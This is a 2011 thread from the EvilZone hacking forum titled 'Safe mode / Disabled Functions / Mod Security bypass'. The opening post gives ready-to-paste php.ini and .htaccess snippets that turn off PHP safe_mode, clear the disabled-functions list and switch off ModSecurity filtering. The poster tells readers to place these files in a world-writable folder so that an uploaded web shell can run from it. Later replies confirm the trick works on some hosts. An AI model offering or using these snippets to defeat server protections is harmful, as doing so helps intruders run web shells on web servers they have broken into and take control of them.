EvilZone

Hacking and Security => Hacking and Security => : hacker@sr.gov.yu April 10, 2011, 03:31:47 PM

: Safe mode / Disabled Functions / Mod Security bypass
: hacker@sr.gov.yu April 10, 2011, 03:31:47 PM

================
Safemode = On (Secure)
================
Disabled_Functions =
dl, passthru, proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, pfsockopen, leak, apache_child_terminate, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid
================

Create A File "Php.ini" In Some Writeable Folder (777) Then Upload And Open Your Shell From There
---------------------
Paste This:

:

safe_mode = OFF
disable_functions = NONE

================
ModSecurity = On
================

Create A File ".htaccess" In Some Writeable Folder (777) Then Upload And Open Your Shell From There
------------------------
Paste This:

:

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

: Re: Safe mode / Disabled Functions / Mod Security bypass
: ande April 10, 2011, 04:19:43 PM

No way :P Thats to dumb xD Have you tested that?

: Re: Safe mode / Disabled Functions / Mod Security bypass
: hacker@sr.gov.yu April 10, 2011, 04:22:36 PM

: ande  April 10, 2011, 04:19:43 PM

No way :P Thats to dumb xD Have you tested that?

Its tested on some servers and it works :P

: Re: Safe mode / Disabled Functions / Mod Security bypass
: ca0s April 11, 2011, 06:20:24 PM

It sometimes works. There are some servers that don't pay attention to any other php.ini file than the one is on the server's config folder.
The .htaccess one should work in every host that lets users upload their own .htaccess file.
Nice two, btw.